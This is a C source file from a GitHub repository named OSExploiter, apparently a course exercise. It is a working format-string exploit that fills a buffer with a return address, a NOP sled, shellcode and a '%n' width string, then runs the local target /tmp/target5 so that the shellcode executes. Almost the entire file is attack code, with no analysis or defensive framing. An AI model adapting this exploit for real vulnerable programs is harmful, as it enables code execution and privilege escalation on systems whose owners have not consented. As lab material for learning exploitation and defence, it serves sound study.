OSExploiter/sploit5.c at master · palms/OSExploiter · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
/*
 * sploit5.c
 * Author - Saul Laufer
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target5"
#define NOP 0x90
#define RETADDR 0xbffffced
#define INJSTR "%u%u%012582523u%n"

int main(void)
{
  char *args[3];
  char *env[1];

  char buf[400];
  int i;


  //loop through buffer to fill correctly
  for (i = 0; i < 400; i++) {

	  //first 4 bytes contain address 1 byte after %eip
    if (i < 4) {
      *(buf + i) = RETADDR >> (i * 8);
    }

    //NOPs slide
    else if (i < (399 - strlen(INJSTR) - strlen(shellcode))) {
      *(buf + i) = NOP;
    }

    //shell code
    else if (i < (399 - strlen(INJSTR))) {
      *(buf + i) = shellcode[i - 399 + strlen(INJSTR) + strlen(shellcode)];
    }

    //last 6 bytes are format string using our width
    //determined from decimal version of 4 bytes after buffer
    //until suitbale input found
    else if (i < 399) {
      memcpy(buf + i, INJSTR, strlen(INJSTR));
      i += (strlen(INJSTR) - 1);
    }

    //null terminate end of buffer
    else {
      *(buf + i) = 0;
    }
  }


  args[0] = TARGET;
  args[1] = buf;
  args[2] = NULL;
  env[0] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}